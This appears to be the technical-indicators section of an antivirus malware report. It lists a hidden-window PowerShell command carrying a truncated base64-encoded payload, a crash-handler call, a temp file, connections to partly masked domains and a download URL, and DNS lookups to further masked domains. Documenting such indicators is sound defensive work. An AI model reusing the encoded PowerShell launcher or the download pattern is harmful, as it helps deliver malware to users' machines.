Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAEEAQQBjAEcAQQBRAHcAIAA9ACAAJwA1ADIAOAAnADsAJABqAEEARABvAEIAbwBCAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAawAxAEIAJwAsACcAWQAnACwAJwBEAFEAdwBBACcAKQA7ACQAWQBVAFEAQgB4AF8AVQA9ACQAZQBuAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\725638.cvr
- 'ne###xtrade.com':80
- 'ne###xtrade.com':443
- http://ne###xtrade.com/wp/kgMUT/
- 'ne###xtrade.com':443
- DNS ASK ha#####lifestore.com
- DNS ASK ne###xtrade.com
- DNS ASK el####pparel.com
- DNS ASK su####sworth.com
- DNS ASK ga#######rsrepairraleigh.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAEEAQQBjAEcAQQBRAHcAIAA9ACAAJwA1ADIAOAAnADsAJABqAEEARABvAEIAbwBCAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAawAxAEIAJwAsACcAWQAnACwAJwBEAFEAdwBBACcAKQA7ACQAWQBVAFEAQgB4AF8AVQA9ACQAZQBuAH...' (with hidden window)